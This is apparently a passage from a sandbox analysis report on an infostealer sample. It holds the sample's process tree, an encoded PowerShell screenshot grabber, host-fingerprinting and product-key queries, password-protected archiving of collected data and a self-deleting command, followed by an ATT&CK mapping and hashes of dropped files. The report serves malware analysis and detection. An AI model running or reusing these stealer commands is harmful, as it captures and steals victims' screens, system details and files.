AKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2532
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\odj1atir\odj1atir.cmdline"
        5⤵
        
        PID:3368
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBBFD.tmp" "c:\Users\Admin\AppData\Local\Temp\odj1atir\CSCD31E62F5FA094B3FBCF6D354357B43B5.TMP"
        6⤵
        
        PID:5248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1768
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5324
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5304
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1108
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5184
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5540
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI57322\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\l4H2z.zip" *"
    3⤵
    PID:4580
  - - C:\Users\Admin\AppData\Local\Temp\_MEI57322\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI57322\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\l4H2z.zip" *
      4⤵
      Executes dropped EXE
      PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4840
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2472
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2580
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1480
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:5316
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:412

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI57322\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\_bz2.pyd

Filesize
46KB

MD5
db5ec505d7c19345ca85d896c4bd7ef4

SHA1
c459bb6750937fbdc8ca078a74fd3d1e8461b11c

SHA256
d3fb8bad482505eb4069fa2f2bb79e73f369a4181b7acc7abe9035ecbd39cec9

SHA512
0d9fdb9054e397bc9035301e08532dc20717ec73ad27cf7134792a859ca234ab0cd4afa77d6cb2db8c35b7b0bccf49935630b3fe1bd0a83a9be228b9c3d8c629

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\_ctypes.pyd

Filesize
56KB

MD5
26e65481188fe885404f327152b67c5e

SHA1
6cd74c25cc96fb61fc92a70bdfbbd4a36fda0e3d

SHA256
b76b63e8163b2c2b16e377114d41777041fcc948806d61cb3708db85cca57786

SHA512
5b58fc45efebc30f26760d22f5fe74084515f1f3052b34b0f2d1b825f0d6a2614e4edaf0ce430118e6aaaf4bb8fcc540699548037f99a75dd6e53f9816068857

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\_decimal.pyd

Filesize
104KB

MD5
072e08b39c18b779446032bf2104247b

SHA1
a7ddad40ef3f0472e3c9d8a9741bd97d4132086c

SHA256
480b8366a177833d85b13415e5bb9b1c5fda0a093ea753940f71fa8e7fc8ed9b

SHA512
c3cdfe14fd6051b92eeff45105c093dce28a4dcfd9f3f43515a742b9a8ee8e4a2dce637e9548d21f99c147bac8b9eb79bcbcd5fc611197b52413b8a62a68da02

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\_hashlib.pyd

Filesize
33KB

MD5
82d28639895b87f234a80017a285822a

SHA1
9190d0699fa2eff73435adf980586c866639205f

SHA256
9ec1d9abac782c9635cdbbb745f6eab8d4c32d6292eebb9efd24a559260cb98e

SHA512
4b184dcc8ccf8af8777a6192af9919bcebcdcddd2a3771ed277d353f3c4b8cb24ffa30e83ff8fbeca1505bf550ea6f46419a9d13fef7d2be7a8ac99320350cfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-console-l1-1-0.dll

Filesize
21KB

MD5
9f746f4f7d845f063fea3c37dcebc27c

SHA1
24d00523770127a5705fcc2a165731723df36312

SHA256
88ace577a9c51061cb7d1a36babbbefa48212fadc838ffde98fdfff60de18386

SHA512
306952418b095e5cf139372a7e684062d05b2209e41d74798a20d7819efeb41d9a53dc864cb62cc927a98df45f7365f32b72ec9b17ba1aee63e2bf4e1d61a6e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-datetime-l1-1-0.dll

Filesize
21KB

MD5
8f8eb9cb9e78e3a611bc8acaec4399cb

SHA1
237eee6e6e0705c4be7b0ef716b6a4136bf4e8a8

SHA256
1bd81dfd19204b44662510d9054852fb77c9f25c1088d647881c9b976cc16818

SHA512
5b10404cdc29e9fc612a0111b0b22f41d78e9a694631f48f186bdde940c477c88f202377e887b05d914108b9be531e6790f8f56e6f03273ab964209d83a60596

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-debug-l1-1-0.dll

Filesize
21KB

MD5
226a5983ae2cbbf0c1bda85d65948abc

SHA1
d0f131dcba0f0717c5dea4a9ca7f2e2ecf0ad1c3

SHA256
591358eb4d1531e9563ee0813e4301c552ce364c912ce684d16576eabf195dc3

SHA512
a1e6671091bd5b2f83bfaa8fcf47093026e354563f84559bd2b57d6e9fa1671eea27b4ed8493e9fdf4bde814074dc669de047b4272b2d14b4f928d25c4be819d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
21KB

MD5
c2f8c03ecce9941492bfbe4b82f7d2d5

SHA1
909c66c6dfea5e0c74d3892d980918251bb08632

SHA256
d56ce7b1cd76108ad6c137326ec694a14c99d48c3d7b0ace8c3ff4d9bcee3ce8

SHA512
7c6c85e390bbe903265574e0e7a074da2ce30d9376d7a91a121a3e0b1a8b0fffd5579f404d91836525d4400d2760cb74c9cb448f8c5ae9713385329612b074cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-fibers-l1-1-0.dll

Filesize
21KB

MD5
b5e2760c5a46dbeb8ae18c75f335707e

SHA1
e71db44fc0e0c125de90a9a87ccb1461e72a9030

SHA256
91d249d7bc0e38ef6bcb17158b1fdc6dd8888dc086615c9b8b750b87e52a5fb3

SHA512
c3400772d501c5356f873d96b95dc33428a34b6fcaad83234b6782b5f4bf087121e4fd84885b1abab202066da98eb424f93dd2eed19a0e2a9f6ff4a5cfd1e4f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-fibers-l1-1-1.dll

Filesize
21KB

MD5
050a30a687e7a2fa6f086a0db89aa131

SHA1
1484322caaf0d71cbb873a2b87bdd8d456da1a3b

SHA256
fc9d86cec621383eab636ebc87ddd3f5c19a3cb2a33d97be112c051d0b275429

SHA512
07a15aa3b0830f857b9b9ffeb57b6593ae40847a146c5041d38be9ce3410f58caa091a7d5671cc1bc7285b51d4547e3004cf0e634ae51fe3da0051e54d8759e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-file-l1-1-0.dll

Filesize
25KB

MD5
9f45a47ebfd9d0629f4935764243dd5a

SHA1
86a4a0ea205e31fb73f3bfcce24945bd6bea06c7

SHA256
1ca895aba4e7435563a6b43e85eba67a0f8c74aa6a6a94d0fc48fa35535e2585

SHA512
8c1cdcad557bff1685a633d181fcf14ec512d322caeaeb9c937da8794c74694fe93528fc9578cb75098f50a2489ed4a5dedf8c8c2ac93eeb9c8f50e3dd690d5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
cc228ff8d86b608e73026b1e9960b2f8

SHA1
cef0705aee1e8702589524879a49e859505d6fe0

SHA256
4cadbc0c39da7c6722206fdcebd670abe5b8d261e7b041dd94f9397a89d1990d

SHA512
17abd9e0ec20b7eb686e3c0f41b043d0742ab7f9501a423b2d2922d44af660379792d1cc6221effbd7e856575d5babf72657ae9127c87cc5cf678bd2ceb1228f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-file-l2-1-0.dll

Filesize
21KB

MD5
e368a236f5676a3da44e76870cd691c9

SHA1
e4f1d2c6f714a47f0dc29021855c632ef98b0a74

SHA256
93c624b366ba16c643fc8933070a26f03b073ad0cf7f80173266d67536c61989

SHA512
f5126498a8b65ab20afaaf6b0f179ab5286810384d44638c35f3779f37e288a51c28bed3c3f8125d51feb2a0909329f3b21273cb33b3c30728b87318480a9ef8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-handle-l1-1-0.dll

Filesize
21KB

MD5
416aa8314222db6cbb3760856be13d46

SHA1
5f28fe2d565378c033ef8eea874bc38f4b205327

SHA256
39095f59c41d76ec81bb2723d646fde4c148e7cc3402f4980d2ade95cb9c84f9

SHA512
b16ed31dc3343caea47c771326810c040a082e0ab65d9ae69946498ceb6ae0dee0a570dbcd88090668a100b952c1ff88bade148811b913c90931aa0e657cd808

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-heap-l1-1-0.dll

Filesize
21KB

MD5
344a09b4be069f86356a89482c156647

SHA1
2506ffeb157cb531195dd04d11d07c16e4429530

SHA256
8f105771b236dbcb859de271f0a6822ce1cb79c36988dd42c9e3f6f55c5f7eb9

SHA512
4c1e616443576dc83200a4f98d122065926f23212b6647b601470806151ff15ea44996364674821afec492b29ba868f188a9d6119b1e1d378a268f1584ca5b29

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
21KB

MD5
86023497fa48ca2c7705d3f90b76ebc5

SHA1
835215d7954e57d33d9b34d8850e8dc82f6d09e8

SHA256
53b25e753ca785bf8b695d89dde5818a318890211dc992a89146f16658f0b606

SHA512
8f8370f4c0b27779d18529164fa40cbfddafa81a4300d9273713b13428d0367d50583271ea388d43c1a96fed5893448cd14711d5312da9dfa09b9893df333186

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-kernel32-legacy-l1-1-1.dll

Filesize
21KB

MD5
0c1cc0a54d4b38885e1b250b40a34a84

SHA1
24400f712bbe1dd260ed407d1eb24c35dcb2ecac

SHA256
a9b13a1cd1b8c19b0c6b4afcd5bb0dd29c0e2288231ac9e6db8510094ce68ba6

SHA512
71674e7ed8650cac26b6f11a05bfc12bd7332588d21cf81d827c1d22df5730a13c1e6b3ba797573bb05b3138f8d46091402e63c059650c7e33208d50973dde39

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
21KB

MD5
5fbcb20d99e463259b4f15429010b9cd

SHA1
b16770f8bb53dc2bafcb309824d6fa7b57044d8a

SHA256
7f39ba298b41e4963047341288cab36b6a241835ee11ba4ad70f44dacd40906c

SHA512
7ba1ac34b3ecfbfb8252f5875be381d8ef823b50dfe0e070222175ee51191f5ee6d541eeedd1445ed603a23d200ce9ce15914c8ed3fafe7e7f3591f51f896c58

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
5241df2e95e31e73ccfd6357ad309df0

SHA1
2644cc5e86dfad1ad2140181ab2ca79725f95411

SHA256
6ee44dd0d8510dc024c9f7c79b1b9fa88c987b26b6beb6653ddd11751c34e5dc

SHA512
52cccd1dd237e764e34996c0c5f7a759a7f0eff29b61befeaf96a16d80df2ba9ee2c3615f875153198a145d68f275aea6d02187e6eee5a129e3e2ab81aaceb16

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-memory-l1-1-0.dll

Filesize
21KB

MD5
8d285430e8bda6d5c9b683579adcb180

SHA1
619dbbcff06c659e3fc48f03917a4dadbfc1c275

SHA256
0512a35316ec9180437f86696a84c5c06a7e4e82e050055a656e5bf9fca206f9

SHA512
38405dd85dd62f843abb55acea1b64d7d63bb601445bf1b32078cde5bbef4861dd99f26659281fe2aea86f58cfb1725d8c63d91fb539dcbf5d98cdbe783337fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
21KB

MD5
4a28ca64f44b91f43945ee3971e0996a

SHA1
45b3d8584c58e8d6ae507fdbd772feeb1886c8b0

SHA256
c05f1fffe3b5a2738ea54ce9485cca026fb9635f982626fba1e1dcc531897273

SHA512
862a0428f08d447cd1ee0431969e0fbcb182f4c46418c26d26fa33e586e686d9c093c1ca5781f544ce9276195ce973850719636e39e465f059607f455ecfdd93

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
21KB

MD5
7fd4a71085783ccfe9c289c07bcf9b04

SHA1
bb6ffdb5c069dbba06998dc877d24f72dad6298d

SHA256
c4eca98c3c67b6395d5b005b00ac1eb0318b86b23aa71035a44c2b1602befba9

SHA512
a96c5b90b8384b239be111d90caa3b947651ad73382ab9e5dbe4a4b6ad30921876545331d37c8d5a8f669e39d71bf60983c4ba39c479e23015c2f7579c5e55cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
21KB

MD5
c123f2c161884fbff4f00ef1e1391266

SHA1
7db3055da53916bea2b85b159491a0772fb620ce

SHA256
5ccb89e93d67bc3288d4e84649c5346e66e15e3d7cd65d989daf3f4cb584be9a

SHA512
dac5616320b9052254b5687959e67126c4a938e79173d8245675a9651674384c36cc856f996ef88ae621ec67afc6616626657585d92bb5d14602a7cc9fc0f669

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
385f562bdc391ccd4f81aca3719f3236

SHA1
f6633e1dac227ba3cd14d004748ef0c1c4135e67

SHA256
4ad565a8ba3ef0ea8ab87221ad11f83ee0bc844ce236607958406663b407333e

SHA512
b72ed1a02d4a02791ca5490b35f7e2cb6cb988e4899eda78134a34fb28964ea573d3289b69d5db1aac2289d1f24fd0a432b8187f7ae8147656d38691ae923f27

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-profile-l1-1-0.dll

Filesize
21KB

MD5
7a629293eeb0bca5f9bdee8ade477c54

SHA1
a25bf8bac4fbfd9216ea827e71344ba07b1d463b

SHA256
7809160932f44e59b021699f5bc68799eb7293ee1fa926d6fcca3c3445302e61

SHA512
1c58c547d1fe9b54ddf07e5407edaf3375c6425ca357aa81d09c76a001376c43487476a6f18c891065ab99680501b0f43a16a10ed8e0d5e87b9a9542098f45fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-rtlsupport-l1-1-0.dll

Filesize
21KB

MD5
3c5c7a3130b075b2def5c413c127173f

SHA1
f3d2b8ad93f3dc99c8410d34c871aec56c52e317

SHA256
9dc1e91e71c7c054854bd1487cb4e6946d82c9f463430f1c4e8d1471005172b1

SHA512
46a52631e3dd49b0ae10afbdf50a08d6d6575f3093b3921b2fa744704e2d317f8b10a6d48ad7f922a7843731782521773032a6cc04833b00bd85e404c168ffe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57322\api-ms-win-core-string-l1-1-0.dll

Filesize
21KB

MD5
28005b20fbef6e1db10912d0fdd6471c

SHA1
47b83697677e08e4ebcff6fc41eca7ece120cc17

SHA256
60fc31d2a0c634412f529dba76af3b9bf991352877c6dae528186d3935704cfd

SHA512
